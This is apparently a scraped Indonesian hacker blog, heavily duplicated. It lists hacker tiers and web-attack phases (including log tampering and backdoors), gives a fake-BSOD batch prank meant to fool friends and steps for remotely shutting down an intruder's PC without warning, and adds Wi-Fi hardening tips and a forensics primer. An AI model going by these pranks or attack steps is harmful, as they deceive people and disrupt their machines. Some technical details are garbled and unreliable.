1. Elite:Juga dikenal sebagai 3l33t, 3l337, 31337 atau kombinasi dari itu; merupakan ujung tombak industri keamanan jaringan. Mereka mengerti sistem operasi luar dalam, sanggup mengkonfigurasi & menyambungkan jaringan secara global. Sanggup melakukan pemrogramman setiap harinya. Sebuah anugrah yang sangat alami, mereka biasanya effisien & trampil,menggunakan pengetahuannya dengan tepat. Mereka seperti siluman dapat memasuki sistem tanpa di ketahui, walaupun mereka tidak akan menghancurkan data-data. Karena mereka selalu mengikuti peraturan yang ada.
2. Semi Elite:Hacker ini biasanya lebih mudadaripada Elite.Mereka juga mempunyai kemampuan & pengetahuan luas tentang komputer. Mereka mengerti tentang sistem operasi (termasuk lubangnya). Biasanya dilengkapi dengan sejumlah kecilprogram cukup untuk mengubah program eksploit. Banyak serangan yang dipublikasi dilakukan oleh Hacker kaliber ini, sialnya oleh para Elite mereka sering kali di kategorikan Lamer.
3. Developed Kiddie: Sebutan ini terutama karena umur kelompok ini masih muda (ABG) & masih sekolah. Mereka membaca tentang metoda hacking & caranya di berbagai kesempatan. Mereka mencoba berbagai sistem sampai akhirnya berhasil & memproklamirkan kemenangan ke lainnya.Umumnya mereka masih menggunakan Grafik UserInterface (GUI) & baru belajar basic dari UNIX, tanpa mampu menemukan lubang kelemahan baru di sistem operasi.
4. Script Kiddie:Seperti developed kiddie, Script Kiddie biasanya melakukan aktifitas di atas. Seperti juga Lamers, mereka hanya mempunyai pengetahuan teknis networking yang sangat minimal. Biasanya tidak lepas dari GUI. Hacking dilakukan menggunakan trojan untuk menakuti & menyusahkan hidup sebagian pengguna Internet.
5. Lamer:Mereka adalah orang tanpa pengalaman & pengetahuan yang ingin menjadi Hacker (wanna-be Hacker). Mereka biasanya membaca atau mendengar tentang Hacker & ingin seperti itu. Penggunaan komputer mereka terutama untuk main game, IRC, tukar menukar software prirate, mencuri kartu kredit. Biasanya melakukan hacking menggunakan software trojan, nuke & DoS. Biasanya menyombongkan diri melalui IRC channel dsb. Karena banyak kekurangannya untuk mencapai elite, dalam perkembangannya mereka hanya akan sampai level developed kiddie atau script kiddie saja. Sumber:http://haxims.blogspot.com/2010/04/tingkatan-tingkatan-dalam-dunia-hacker.html
Senin, 13 Juni 2011
Variasi Teknik hacking web
Terdapat beberapa cara untuk Hacker dapat mengancam jaringan web. Berikut list beberapa teknik hacking yang sering dipakai di dunia cybercrime :
Reconnaissance
Dalam teknik ini, hacker dapat memperoleh informasi mengenai target system, termasuk username, password, parameter input, program atau bahasa script, tipe server, dan system operasi.
Probe
Dalam fase ini hacker mendeteksi kelemahan system SQL injection termasuk dalam teknik ini dan banyak digunakan untuk menemukan hal tersembunyi dan lubang keamanan yang ada.
Toehold
hacker akan memproses fase ini ketika penyusup masuk ke dalam system, membangun koneksi, biasanya menyerang session, mencari informasi system dan mulai mengeksploitasi kelemahan keamanan.
Advancement
Fase ini hacker akan mencari konfigurasi error dan mengubah ke account user yang masih unprivileged menjadi priilege, atau bergerak dari normal user dengan sedikit izin akses menjadi administrator, dimana setelah itu hacker akan mendapatkan full akses untuk membuat, menghapus, memodifikasi, menerima atau memindahkan file dan informasi.
Stealth
Langkah stealth ini berupa penyamaran keberadaan penyusup yang sudah masuk ke system. Langkah tersebut dilakukan dengan mengakses dan memodifikasi log file untuk menghilangkan bukti yang dapat memberitahukan user mengenai serangan tersebut.
Listening Port
Dalam listening port tersebut, penyusup akan mengeset backdoor, yakni program ‘jahat’ yang akan memastikan aktivitas selanjutnya tidak bisa dilakukan. Program itu dinamakan ‘stealth’, atau tool backdoor, atau sniffer. Selain itu, penyusup juga dapat memberikan informasi yang salah ketika user mengakses file dan memproses jaringan system, dengan tujuan untuk menyamarkan keberadaan user.
Takeover
Digunakan untuk memperluas control dari satu system ke system lain di jaringan yang sama. Penyusup dapat menggunakan sniffer untuk mendeteksi informasi di host lain, seperti username dan password. Step ini dapat digunakan untuk menemukan host computer yang belum terkena hack sehingga penyusup dapat mengakses host lain. Step ini umumnya dilakukan dengan bahasa pemrograman yang simpe dan dikontrol oleh programmer.
Nah… itu dia teknik hack website yang sering dipakai hacker..
Salam Hacker…
Sumber : http://www.linksolusi.com/index.php?pilih=memberlist&mod=yes.
Reconnaissance
Dalam teknik ini, hacker dapat memperoleh informasi mengenai target system, termasuk username, password, parameter input, program atau bahasa script, tipe server, dan system operasi.
Probe
Dalam fase ini hacker mendeteksi kelemahan system SQL injection termasuk dalam teknik ini dan banyak digunakan untuk menemukan hal tersembunyi dan lubang keamanan yang ada.
Toehold
hacker akan memproses fase ini ketika penyusup masuk ke dalam system, membangun koneksi, biasanya menyerang session, mencari informasi system dan mulai mengeksploitasi kelemahan keamanan.
Advancement
Fase ini hacker akan mencari konfigurasi error dan mengubah ke account user yang masih unprivileged menjadi priilege, atau bergerak dari normal user dengan sedikit izin akses menjadi administrator, dimana setelah itu hacker akan mendapatkan full akses untuk membuat, menghapus, memodifikasi, menerima atau memindahkan file dan informasi.
Stealth
Langkah stealth ini berupa penyamaran keberadaan penyusup yang sudah masuk ke system. Langkah tersebut dilakukan dengan mengakses dan memodifikasi log file untuk menghilangkan bukti yang dapat memberitahukan user mengenai serangan tersebut.
Listening Port
Dalam listening port tersebut, penyusup akan mengeset backdoor, yakni program ‘jahat’ yang akan memastikan aktivitas selanjutnya tidak bisa dilakukan. Program itu dinamakan ‘stealth’, atau tool backdoor, atau sniffer. Selain itu, penyusup juga dapat memberikan informasi yang salah ketika user mengakses file dan memproses jaringan system, dengan tujuan untuk menyamarkan keberadaan user.
Takeover
Digunakan untuk memperluas control dari satu system ke system lain di jaringan yang sama. Penyusup dapat menggunakan sniffer untuk mendeteksi informasi di host lain, seperti username dan password. Step ini dapat digunakan untuk menemukan host computer yang belum terkena hack sehingga penyusup dapat mengakses host lain. Step ini umumnya dilakukan dengan bahasa pemrograman yang simpe dan dikontrol oleh programmer.
Nah… itu dia teknik hack website yang sering dipakai hacker..
Salam Hacker…
Sumber : http://www.linksolusi.com/index.php?pilih=memberlist&mod=yes.
Trik ngerjain orang dengan Fuck Blue Screen Of Death
Ini bukan BSOD asli ini cuma fuck BSOD, toh kita juga bikinnya pake script. Memang tampak seperti beneran. Tapi kalau dilihat-lihat ini hanya sebuah BSOD buatan. Udah kemane2 nih kita ngebahas. Jangan2 belum tahu BSOD itu apaan. Oke The Blue Screen of Death (juga dikenal sebagai stop error, BSOD, bluescreen, atau Blue Screen of Doom) adalah perkataan sehari-hari digunakan untuk layar kesalahan ditampilkan oleh beberapa sistem operasi, khususnya Microsoft Windows, setelah menghadapi kesalahan sistem kritis yang dapat menyebabkan sistem untuk menutup untuk mencegah kerusakan ireversibel sistem integritas. Ini berfungsi untuk menyajikan informasi untuk tujuan diagnostik yang dikumpulkan sebagai sistem operasi yang dikeluarkan bug cek.
udah ngertikan sekarang kita bikin BSOD palsunye yuk. Cukup copast script dibawah ini
@echo off
udah ngertikan sekarang kita bikin BSOD palsunye yuk. Cukup copast script dibawah ini
@echo off
color 97 :animasi echo A problem has been detected and windows has been shut down to prevent damage to your computer . echo. echo RIVER_IRQL_NOT_LESS_OR_EQUAL echo. echo If this is the first time you’ve seen this stop error screen, echo Restart your computer, If this screen appears again, follow echo These steps : echo. echo Check to make sure any new hardware or software is properly installed. echo If this a new installation, ask your hardware or software manufacturerecho for any windows updates you might need. echo. echo If problems continue, disable or remove any newly installed hardware echo or software. Disable BIOS memory options such as chacing or shadowing. echo If you need to use Safe Mode to remove or disable components, restart echo your computer , press F8 to select advanced Starup options, and then select safe mode. echo. echo Technical Information: echo. echo *** STOP: 0x000000D1 (oxoooooooC, 0x00000002, 0x00000000, 0xF86B5A89) echo. echo *** gv3.sys – Address F86B5A89 base at F86B5000, DateStamp 3dd991eb echo. echo Beginning dump of physical memory echo Physical memory dump complete. echo Technical Information: echo. echo *** STOP: 0x000000D1 (oxoooooooC, 0x00000002, 0x00000000, 0xF86B5A89) echo. echo *** gv3.sys – Address F86B5A89 base at F86B5000, DateStamp 3dd991eb echo. echo Beginning dump of physical memory echo Physical memory dump complete. echo. echo ***************************System ERRORR*********** ******************* echo. echo Check to make sure any new hardware or software is properly installed. echo If this a new installation, ask your hardware or software manufacturer echo for any windows updates you might need. echo. echo If problems continue, disable or remove any newly installed hardware echo or software. Disable BIOS memory options such as chacing or shadowing. echo If you need to use Safe Mode to remove or disable components, restart echo your computer , press F8 to select advanced Starup options, and then select safe mode. pause>nul cls goto:animasi Copastnya di notepad ye, jangan lupa simpan dengan ekstensi .bat Nah sekarang kalian tinggal bikin skenarionya sendiri agar teman kita percaya kalau komputernya mendapatkan BSOD ini langsung dari Windowsnya..Hhee. Selamat mencoba, dan semoga sukses Salam Hacker
Menjadi sang Penyusup (Shutdown)
Menjadi penyusup memang menyenangkan. Tapi segalanya akan jadi menjengkelkan tatkala kita dalam posisi korban/sang admin. Ini hanya salah satu alternatif untuk menjahili sang penyusup. Kita akan mematikan komputernya jarak jauh Tak perlu repot-repot menggunakan program remote kesayangan anda, gunakan saja bawaan windows. Mengenai bagaimana cara mendeteksi sang penyusup, baca artikel terdahulu.
1. Buka Windows Command Processor anda. Klik Start -> Run lalu ketik: cmd (kalo gak tau nanya ama tukang bakso sana..!!)
2. Pada command prompt, ketik: shutdown -i lalu tekan Enter.
3. Perintah tersebut akan memanggil kotak dialog Remote Shutdown.
4. Klik tombol Add untuk memasukkan IP Address atau nama komputer target. Anda bisa memilih aksi, Shutdown, Log Off atau Restart. Pada kolom Display warning for anda bisa menentukan berapa lama countdown yang kan ditampilkan sebelum komputer di shutdown/log off/restart. Pada Opsi planned, ada pesan otomatis yang bisa anda pilih. Pada kolom Comment, anda bisa menuliskan pesan anda untuk sang penyusup. Entah ledekan atau.. terserah anda laah.. Saya rasa anda lebih jago soal ledek-meledek hehehe…
5. Klik OK sesudahnya.
Hohoho… menyenangkan bukan?? Eh?? Kenapa?? Oh, anda adalah sang penyusup?? tidak ingin komputer yang anda pakai dimatikan dengan cara seperti diatas?? Tenang, saya ada sedikit tips..
1. Saat anda melihat kotak dialog peringatan bahwa komputer anda akn segera di shutdown, secepat mungkin bukalah Notepad atau aplikasi Microsoft Word. Ketik kata-kata apa aja , terserah anda, yang penting jangan biarkan kosong. Jangan menekan tombol Save!!
2. Saat "waktu eksekusi" menunjukkan angka 00:00:00, windows akan berusaha menutup aplikasi-aplikasi yang masih terbuka. Nah, aplikasi Notepad/Microsoft word yang anda buka tadi akan meminta konfirmasi dari anda apakah anda ingin menyimpan dokumen anda. Jangan pilih apa-apa, biarkan saja kotak dialog tu bertanya-tanya ,,,
3. Beberapa saat kemudian akan muncul kotak dialog End Program, klik tanda silang yang berada pada pojok kanan atas atau pilih cancel. Kotak dialog yang muncul berbeda-beda, kurang lebih demikian:
Nah, anda akan mendapati komputer anda tetap hidup, sehat walafiat dan berdiri tegak. hehehe…
Cuma itu caranya?? Ada nich yang lebih "formal" ^_^
1. Klik START -> Run
2. Secepat kilat, ketik shutdown -a
Perintah itu adalah perintah untuk melakukan Abort terhadap shutdown.
Lalu apa yang akan dilakukan sang Admin?? Tentu kondisi ini tidak bisa didiamkan. Jangan biarkan sang Penyusup senyum-senyum sendiri. Andalah sebagai admin yang harus tersenyum Beri serangan kedua!! Jangan dulu pakai software remot favorit anda, nggak perlu ngeluarin senjata pamungkas untuk penyusup seperti ini. Ulangi langkah awal tadi, shutdown -i, namun jangan beri centang pada opsi Warn Users Of the action dan kosongi juga opsi Planned. Jangan beri pesan apa-apa dan komputer sang penyusup akan langsung shutdown tanpa konfirmasi
Sekian… and Happy SHUTTING DOWN!!! ^_^
Salam Hacker
1. Buka Windows Command Processor anda. Klik Start -> Run lalu ketik: cmd (kalo gak tau nanya ama tukang bakso sana..!!)
2. Pada command prompt, ketik: shutdown -i lalu tekan Enter.
3. Perintah tersebut akan memanggil kotak dialog Remote Shutdown.
4. Klik tombol Add untuk memasukkan IP Address atau nama komputer target. Anda bisa memilih aksi, Shutdown, Log Off atau Restart. Pada kolom Display warning for anda bisa menentukan berapa lama countdown yang kan ditampilkan sebelum komputer di shutdown/log off/restart. Pada Opsi planned, ada pesan otomatis yang bisa anda pilih. Pada kolom Comment, anda bisa menuliskan pesan anda untuk sang penyusup. Entah ledekan atau.. terserah anda laah.. Saya rasa anda lebih jago soal ledek-meledek hehehe…
5. Klik OK sesudahnya.
Hohoho… menyenangkan bukan?? Eh?? Kenapa?? Oh, anda adalah sang penyusup?? tidak ingin komputer yang anda pakai dimatikan dengan cara seperti diatas?? Tenang, saya ada sedikit tips..
1. Saat anda melihat kotak dialog peringatan bahwa komputer anda akn segera di shutdown, secepat mungkin bukalah Notepad atau aplikasi Microsoft Word. Ketik kata-kata apa aja , terserah anda, yang penting jangan biarkan kosong. Jangan menekan tombol Save!!
2. Saat "waktu eksekusi" menunjukkan angka 00:00:00, windows akan berusaha menutup aplikasi-aplikasi yang masih terbuka. Nah, aplikasi Notepad/Microsoft word yang anda buka tadi akan meminta konfirmasi dari anda apakah anda ingin menyimpan dokumen anda. Jangan pilih apa-apa, biarkan saja kotak dialog tu bertanya-tanya ,,,
3. Beberapa saat kemudian akan muncul kotak dialog End Program, klik tanda silang yang berada pada pojok kanan atas atau pilih cancel. Kotak dialog yang muncul berbeda-beda, kurang lebih demikian:
Nah, anda akan mendapati komputer anda tetap hidup, sehat walafiat dan berdiri tegak. hehehe…
Cuma itu caranya?? Ada nich yang lebih "formal" ^_^
1. Klik START -> Run
2. Secepat kilat, ketik shutdown -a
Perintah itu adalah perintah untuk melakukan Abort terhadap shutdown.
Lalu apa yang akan dilakukan sang Admin?? Tentu kondisi ini tidak bisa didiamkan. Jangan biarkan sang Penyusup senyum-senyum sendiri. Andalah sebagai admin yang harus tersenyum Beri serangan kedua!! Jangan dulu pakai software remot favorit anda, nggak perlu ngeluarin senjata pamungkas untuk penyusup seperti ini. Ulangi langkah awal tadi, shutdown -i, namun jangan beri centang pada opsi Warn Users Of the action dan kosongi juga opsi Planned. Jangan beri pesan apa-apa dan komputer sang penyusup akan langsung shutdown tanpa konfirmasi
Sekian… and Happy SHUTTING DOWN!!! ^_^
Salam Hacker
Mengurangi Kegiatan Attacking jaringan WIFI
Wi-Fi merupakan kependekan dari Wireless Fidelity, yang memiliki pengertian yaitu sekumpulan standar yang digunakan untuk Jaringan Lokal Nirkabel (Wireless Local Area Networks - WLAN) yang didasari pada spesifikasi IEEE 802.11. Standar terbaru dari spesifikasi 802.11a atau b, seperti 802.16 g, saat ini sedang dalam penyusunan, spesifikasi terbaru tersebut menawarkan banyak peningkatan mulai dari luas cakupan yang lebih jauh hingga kecepatan transfernya.
Beberapa hal terpenting yang harus Anda lakukan demi keamanan Jaringan Wireless yang Anda miliki, ya... minimal mengurangi tingkat kegiatan attaking :
1. Ubah Password Default Access Point.
2. Jika memungkinkan, ubah IP default. (beberapa merk Access Point biasanya sudah disertai
fasilitas ini).
3. Aktifkan metode enkripsi, gunakan enkripsi WPA dengan Pre Shared Key (WPA-PSK), dan
berikan password yang aman. Bisa juga memanfaat enkripsi WPA dengan Temporal Key
Integrity Protokol).
4. Matikan fungsi Broadcast SSID, sehingga SSID Anda tidak terdeksi pada proses War Driving.
5. Lindunngi SSID, dengan cara : merubah nama SSID default dengan nama SSID yang tidak
mudah ditebak.
6. Gunakan MAC Address Filtering untuk mengurangi kegiatan penysupan
7. Non Aktifkan DHCP, gunakan IP Static dengan nilai yang jarang diguakan.
8. Gunakan Security tambahan seperti : CaptivePortal atau aplikasi lainnya yang di inject pada
firmware Access Point.
9. Access Point Monitoring via Client, ini adalah cara terbaru uuntuk melakukan controlling
terhadapa Access Point yang Anda miliki melalui client. Proses ‘IP Block’, ‘Client Resctriction’
dan tentang keamanan lainnya. Salah satu aplikasi yang bias digunakan adalah : Mc Affe
Wireless Home Security. ingat.. tidak ada system yg 100% secure... tapi tetaplah berusaha untuk
mengamankan aset yang Anda miliki.....
Nah,, ada baiknya kita berhati-hati terhadap hal tersebut untuk menghindari hal-hal yang tidak diinginkan..
Salam Hacker……
Beberapa hal terpenting yang harus Anda lakukan demi keamanan Jaringan Wireless yang Anda miliki, ya... minimal mengurangi tingkat kegiatan attaking :
1. Ubah Password Default Access Point.
2. Jika memungkinkan, ubah IP default. (beberapa merk Access Point biasanya sudah disertai
fasilitas ini).
3. Aktifkan metode enkripsi, gunakan enkripsi WPA dengan Pre Shared Key (WPA-PSK), dan
berikan password yang aman. Bisa juga memanfaat enkripsi WPA dengan Temporal Key
Integrity Protokol).
4. Matikan fungsi Broadcast SSID, sehingga SSID Anda tidak terdeksi pada proses War Driving.
5. Lindunngi SSID, dengan cara : merubah nama SSID default dengan nama SSID yang tidak
mudah ditebak.
6. Gunakan MAC Address Filtering untuk mengurangi kegiatan penysupan
7. Non Aktifkan DHCP, gunakan IP Static dengan nilai yang jarang diguakan.
8. Gunakan Security tambahan seperti : CaptivePortal atau aplikasi lainnya yang di inject pada
firmware Access Point.
9. Access Point Monitoring via Client, ini adalah cara terbaru uuntuk melakukan controlling
terhadapa Access Point yang Anda miliki melalui client. Proses ‘IP Block’, ‘Client Resctriction’
dan tentang keamanan lainnya. Salah satu aplikasi yang bias digunakan adalah : Mc Affe
Wireless Home Security. ingat.. tidak ada system yg 100% secure... tapi tetaplah berusaha untuk
mengamankan aset yang Anda miliki.....
Nah,, ada baiknya kita berhati-hati terhadap hal tersebut untuk menghindari hal-hal yang tidak diinginkan..
Salam Hacker……
Mengenal Ahli Forensik Dan Detektif Dunia Cyber
Diawali dengan meningkatnya kejahatan di dunia computer khususnya di Internet, saat ini
terdapat banyak sekali tingkat kriminalitas di Internet, seperti ; pencurian data pada sebuah
site, pencurian informasi dari computer, Dos, Deface sites, carding, software bajakan, CC
Cloning,
Kita tau ada banyak sekali kasus di dunia computer, dan pada umumnya kita sebagai orang awam kesusahan untuk membuktikan telah terjadinya penyalahgunaan sistem kita oleh orang lain. Lain halnya dengan pihak kepolisian yang saat ini telah berbenah diri untuk dapat
mengungkap kasus demi kasus di dunia cyber dan computer ini.
Komputer forensik, suatu disiplin ilmu baru di dalam keamanan komputer, yang membahas atas temuan bukti digital setelah suatu peristiwa keamanan komputer terjadi.
Komputer forensik akan lakukan analisa penyelidikan secara sistematis dan harus menemukan
bukti pada suatu sistem digital yang nantinya dapat dipergunakan dan diterima di depan
pengadilan, otentik, akurat, komplit, menyakinkan dihadapan juri, dan diterima didepan
masyarakat.
Hal ini dilakukan oleh pihak berwajib untuk membuktikan pidana dari tindak suatu kejahatan.
Maka saat ini menjadi seorang detective tidak hanya didunia nyata tapi juga didunia cyber.
Coba kita bayangkan seorang hacker telah berhasil masuk ke system kita atau merubah data
kita, baik itu menyalin, menghapus, menambah data baru, dll, Susah untuk kita buktikan
karena keterbatasan alat dan tools. Dengan metode computer forensic kita dapat melakukan
analisa seperti layaknya kejadian olah TKP….
Apa aja peralatan yang dibutuhkan untuk menjadi seorang detective cyber ini ?
Yang pasti peralatan standar polisi seperti, rompi anti peluru, dll, namun tidak seperti polisi
biasa seperti pasukan khusus atau penjinak bom, detektif cyber ini atau forensic dunia digital
ini dilengkapi dengan peralatan lain seperti hardware dan software tertentu, dan yang pasti
mereka mengerti dan menguasai OS tertentu, misal Windows, Linux atau OS lain.
Dari segi hardware dilengkapi dengan lampu senter, laptop, kamera digital dan computer
forensics toolkit.
Hardware disini bisa berupa sebuah computer khusus seperti FREDM (Forensics Recovery of
Evidence Device, Modular), FRED (Forensics Recovery of Evidence Device) FREDDIE
(Forensics Recovery of Evidence Device Diminutive Interrogation Equipment).
Tool hardware lain seperti ;
• Hardisk kapasitas besar (minimal 250 GB)
• IDE ribbon cable
• Boot Disk atau utility akusisi data
• Laptop IDE 40 pin adapter
• IDE Disk ekternal write protector
• Kantong plastic anti-static
• Label untuk barang bukti
Software khususnya ;
• Forensics Data seperti : En case, Safe Back, Norton Ghost
• Password Recovery toolkit
• Pembangkit data setelah delete : WipeDrive dan Secure Clean
• Menemukan perubahan data digital : DriveSpy
• dll
Apa yang harus dilakukan oleh seorang forensics atau detective ini setelah penyitaan barang
bukti ?
Prosedurnya hampir sama dengan yang biasa pada kepolisian namun ada beberapa hal yang
menjadi catatan, yaitu ;
• dilengkapi surat perintah sita dan menunjukan apa yang akan disita
• metode penyimpanan, pengantar dan penjagaan barang bukti harus terjamin.
• penyitaan biasanya tidak hanya computer tapi bisa juga peralatan lain yang dapat
meyimpan data dan sebagai alat komunikasi data, mis : mesin fax, telpon hp, printer, PDA,
DVD rec, camera digital mesin fotocopy, dll
• kita tidak boleh melakukan booting pc atau laptop tersebut, kita harus membuat image
restorenya atau raw datanya.
• Jangan pernah menyalin, menulis bahkan menghapus data yang ada di disk tersangka
walaupun itu termasuk file yang tidak penting
• Kita harus dapat menelaah dan menganalisa terhadap barang bukti
• Catatlah sebuah temuan, perubahan, dan kegiatan yang kita lakukan
• Lakukan percobaan berulang kali dan pastikan hasilnya sama
Tadi dibilang dalam langkah setelah penyitaan adalah kita tidak boleh melakukan booting pada
mesin tersebut, mengapa dan lantas gimana kita mengetahui isi dari hardisknya ?
OK maksudnya kenapa kita ngak boleh boot dari mesin korban karena bisa saja pada saat kita
boot dari hardisknya, tersangka telah membuat semacam script yang apabila kita melakukan
boot tidak dengan cara yang dibuatnya maka isi dari seluruh hardisk nya akan hancur alias
terhapus.
Atau bisa saja pada saat di boot maka struktur file dan system OS nya berubah secara total,
karena setiap OS cenderung mempunyai karakteristik masing-masing.
Nah agar kita aman dan tidak merusah data yang ada didalam hardisk mesin tersebut, kita
dapat melakukan berbagai cara, diantaranya telah menjadi standar adalah dengan membuat
raw image copy dari hardisk tersangka, dengan jalan mencabut hardisk dan memasangkannya
pada IDE (ATA) port ke computer forensic kita. Pada proses ini kita harus ekstra hati-hati
karena bisa saja secara tidak sengaja kita menghapus filenya, maka kita memerlukan suatu alat
disebut sebagai IDE HARDWARE BASED BLOCK WRITE BLOCKER seperti dari FireFly.
Untuk memindahkan datanya tanpa menganggu file tersangka kita dapat menggunakan Norton Ghost atau encase untuk menyalin datanya agar dapat kita pelajari lebih jauh, intinya Norton ghost dan Encase membuat restore datanya.
Lalu jika hard disk ngakbisa dicopot dari mesin tersangka, kita harus membuat disk boot dari
disk kita, misalnya boot disk DOS atau Linux yang dilengkapi dengan fasilitas dd dan rewrite
untuk menyalin data.
Tadi disebutkan langkah-langkah pada teknik forensic ini, apakah ada suatu teknik khusus pada
investigitasi dunia digital ini ?
Yap sudah pasti, menurut I.J.D.E (Internasional Journal of Digital Evidence) suatu badan
internasional yang menangani kejadian pembuktian secara digital, ada dua garis besar yaitu :
Evidence Gathering dan Evidence Analysis
Analisa terhadap barang bukti bertujuan untuk membentuk petunjuk yang ada, mengidentifikas tersangka, format data, pengembangan barang bukti mengrekontruksi kejahatan yang dilakukan dan mengumpulkan lebih banyak data. Data yang didapat mungkin saja mengarah ke IP address tertentu, nama-nama file yang ada, system name, jenis file dan isinya, software yang terinstall, motif, cara dan tools lain yang digunakan dapat kita ungkap.
Format data harus menjadi perhatian kita karena ada banyak system yang standar sampai yang
non standar, data yang terkompresi, dienkrpsi biasanya data yang menjadi perhatian adalah
data yang telah dihapus atau sengaja disembunyikan dengan metode enkripsi tertentu.
Dalam kasus biasanya dalam kepolisian, polisi harus bertindak berdasarkan bukti yang konkrit,
apakah ada karakteristik pembuktian secara khusus dalam dunia digital dan cyber ini ?
Sama seperti pembuktian secara umum dalam dunia digital atau forensic ini ada beberapa
karakteristik khusus, seperti ;
• Admission (dapat diterima), dengan menyertakan bukti dokumen atau catatan selama
pemeriksaan
• Otentik, dapat menjelaskan secara spesifik seperti file dan kejadian yang dapat berupa
logging, audit logs, access list, dll
• Akurat, dapat membuktikan proses system tidak hanya isi datanya sampai dengan output
yang dihasilkan
• Komplit, dapat menceritakan secara lengkap dan utuh sampai akhir
• Menyakinkan didepan pengadilan, dapat dipresentasikan atau dijelaskan didepan
pengadilan dengan jelas dan akurat.
Computer forensics sangat berhubungan dengan pembuktian fakta maupun interpretasi, fakta
dikumpulkan dan didokumentasi, sedangkan interpretasi bersifat subyektif, untuk itu
kebenaran harus dapat diturunkan daro eksperiman.
Tadi disinggung masalah log-log dalam tahapan analisa dan karakterisitk dalam dunia forensic
ini, apa saja yang harus kita perhatikan dalam menanalisis suatu log system ?
Ada beberapa file log yang harus menjadi perhatian kita sebagai ahli forensics dan detective
digital, diantaranya ;
• Email
• Temp File
• Recycle bin
• Informasi file fragmentasi disk
• Recent link files
• Spool printed files
• Internet history (temp)
• Registry
• Space yang tidak digunakan pada disk
• Sector pada disk.
Sekian dulu artikelnya… Salam Hacker
terdapat banyak sekali tingkat kriminalitas di Internet, seperti ; pencurian data pada sebuah
site, pencurian informasi dari computer, Dos, Deface sites, carding, software bajakan, CC
Cloning,
Kita tau ada banyak sekali kasus di dunia computer, dan pada umumnya kita sebagai orang awam kesusahan untuk membuktikan telah terjadinya penyalahgunaan sistem kita oleh orang lain. Lain halnya dengan pihak kepolisian yang saat ini telah berbenah diri untuk dapat
mengungkap kasus demi kasus di dunia cyber dan computer ini.
Komputer forensik, suatu disiplin ilmu baru di dalam keamanan komputer, yang membahas atas temuan bukti digital setelah suatu peristiwa keamanan komputer terjadi.
Komputer forensik akan lakukan analisa penyelidikan secara sistematis dan harus menemukan
bukti pada suatu sistem digital yang nantinya dapat dipergunakan dan diterima di depan
pengadilan, otentik, akurat, komplit, menyakinkan dihadapan juri, dan diterima didepan
masyarakat.
Hal ini dilakukan oleh pihak berwajib untuk membuktikan pidana dari tindak suatu kejahatan.
Maka saat ini menjadi seorang detective tidak hanya didunia nyata tapi juga didunia cyber.
Coba kita bayangkan seorang hacker telah berhasil masuk ke system kita atau merubah data
kita, baik itu menyalin, menghapus, menambah data baru, dll, Susah untuk kita buktikan
karena keterbatasan alat dan tools. Dengan metode computer forensic kita dapat melakukan
analisa seperti layaknya kejadian olah TKP….
Apa aja peralatan yang dibutuhkan untuk menjadi seorang detective cyber ini ?
Yang pasti peralatan standar polisi seperti, rompi anti peluru, dll, namun tidak seperti polisi
biasa seperti pasukan khusus atau penjinak bom, detektif cyber ini atau forensic dunia digital
ini dilengkapi dengan peralatan lain seperti hardware dan software tertentu, dan yang pasti
mereka mengerti dan menguasai OS tertentu, misal Windows, Linux atau OS lain.
Dari segi hardware dilengkapi dengan lampu senter, laptop, kamera digital dan computer
forensics toolkit.
Hardware disini bisa berupa sebuah computer khusus seperti FREDM (Forensics Recovery of
Evidence Device, Modular), FRED (Forensics Recovery of Evidence Device) FREDDIE
(Forensics Recovery of Evidence Device Diminutive Interrogation Equipment).
Tool hardware lain seperti ;
• Hardisk kapasitas besar (minimal 250 GB)
• IDE ribbon cable
• Boot Disk atau utility akusisi data
• Laptop IDE 40 pin adapter
• IDE Disk ekternal write protector
• Kantong plastic anti-static
• Label untuk barang bukti
Software khususnya ;
• Forensics Data seperti : En case, Safe Back, Norton Ghost
• Password Recovery toolkit
• Pembangkit data setelah delete : WipeDrive dan Secure Clean
• Menemukan perubahan data digital : DriveSpy
• dll
Apa yang harus dilakukan oleh seorang forensics atau detective ini setelah penyitaan barang
bukti ?
Prosedurnya hampir sama dengan yang biasa pada kepolisian namun ada beberapa hal yang
menjadi catatan, yaitu ;
• dilengkapi surat perintah sita dan menunjukan apa yang akan disita
• metode penyimpanan, pengantar dan penjagaan barang bukti harus terjamin.
• penyitaan biasanya tidak hanya computer tapi bisa juga peralatan lain yang dapat
meyimpan data dan sebagai alat komunikasi data, mis : mesin fax, telpon hp, printer, PDA,
DVD rec, camera digital mesin fotocopy, dll
• kita tidak boleh melakukan booting pc atau laptop tersebut, kita harus membuat image
restorenya atau raw datanya.
• Jangan pernah menyalin, menulis bahkan menghapus data yang ada di disk tersangka
walaupun itu termasuk file yang tidak penting
• Kita harus dapat menelaah dan menganalisa terhadap barang bukti
• Catatlah sebuah temuan, perubahan, dan kegiatan yang kita lakukan
• Lakukan percobaan berulang kali dan pastikan hasilnya sama
Tadi dibilang dalam langkah setelah penyitaan adalah kita tidak boleh melakukan booting pada
mesin tersebut, mengapa dan lantas gimana kita mengetahui isi dari hardisknya ?
OK maksudnya kenapa kita ngak boleh boot dari mesin korban karena bisa saja pada saat kita
boot dari hardisknya, tersangka telah membuat semacam script yang apabila kita melakukan
boot tidak dengan cara yang dibuatnya maka isi dari seluruh hardisk nya akan hancur alias
terhapus.
Atau bisa saja pada saat di boot maka struktur file dan system OS nya berubah secara total,
karena setiap OS cenderung mempunyai karakteristik masing-masing.
Nah agar kita aman dan tidak merusah data yang ada didalam hardisk mesin tersebut, kita
dapat melakukan berbagai cara, diantaranya telah menjadi standar adalah dengan membuat
raw image copy dari hardisk tersangka, dengan jalan mencabut hardisk dan memasangkannya
pada IDE (ATA) port ke computer forensic kita. Pada proses ini kita harus ekstra hati-hati
karena bisa saja secara tidak sengaja kita menghapus filenya, maka kita memerlukan suatu alat
disebut sebagai IDE HARDWARE BASED BLOCK WRITE BLOCKER seperti dari FireFly.
Untuk memindahkan datanya tanpa menganggu file tersangka kita dapat menggunakan Norton Ghost atau encase untuk menyalin datanya agar dapat kita pelajari lebih jauh, intinya Norton ghost dan Encase membuat restore datanya.
Lalu jika hard disk ngakbisa dicopot dari mesin tersangka, kita harus membuat disk boot dari
disk kita, misalnya boot disk DOS atau Linux yang dilengkapi dengan fasilitas dd dan rewrite
untuk menyalin data.
Tadi disebutkan langkah-langkah pada teknik forensic ini, apakah ada suatu teknik khusus pada
investigitasi dunia digital ini ?
Yap sudah pasti, menurut I.J.D.E (Internasional Journal of Digital Evidence) suatu badan
internasional yang menangani kejadian pembuktian secara digital, ada dua garis besar yaitu :
Evidence Gathering dan Evidence Analysis
